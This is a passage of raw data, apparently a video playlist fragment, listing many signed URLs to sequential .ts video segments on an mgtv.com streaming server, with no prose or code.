MbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C83A966488555CC9AA74D7446DC08F14_1210080_1220080_779_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E683A5A65515812DFECECED8EAADFE78_1220080_1230080_1061_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/B08EE905BE136EB6A6384D5D760A1930_1230080_1240080_1263_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC
5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4BD5696FD89A50108A220F321514085C_1240080_1250080_866_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F836A738F8265564C9BF417948964C4D_1250080_1260080_470_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s
6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CB1F15FFD826277722445A90B4A1A96C_1260080_1270080_1737_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/890FED4B2371BAA9B06D7229E74C9C38_1270080_1280080_1207_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3C6FE67C913F9C1E86ED0EB7012B0154_1280080_1290080_1501_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUO
JwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5E7B7F94E32642A9A1F0DA9ACF60921B_1290080_1300080_2485_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/164D59603C9400E92F4E8C8E848D3B2B_1300080_1310080_1589_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmM
lJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/63B84B59E4E988D9CB42D87950835D7C_1310080_1320080_1074_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/26F9A2E4DD4B1CC449BB58E02C725F80_1320080_1330080_1171_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/86E4D7A2CE03D8D1AD9D3BF7A7E251DF_1330080_1340080_1284_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m
6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/1B4EF30F3520A77CF0AC330163EC3246_1340080_1350080_1637_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7D5B58327AFB655A8FC1B486C0CD1B0A_1350080_1360080_1166_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&rui
d=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4A5496162692B592CEC1D7658AEAF5A4_1360080_1370080_840_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/54B0D85B1234909D0525DC21CE662C77_1370080_1380080_1213_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/44970D73ECB24651F824B9F4289AC4B8_1380080_1390080_1316_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvUR
RdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/A8D58B7E104783362F4406862C251C51_1390080_1400080_368_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/91E0D6EFD40AADA61132CFCCD39033E5_1400080_1410080_1344_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12R
Yna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/84C4648B4B48743AB053110C710C5DFB_1410080_1420080_867_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3691E6317FAFAD4940FF890B1D98AEF2_1420080_1430080_444_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33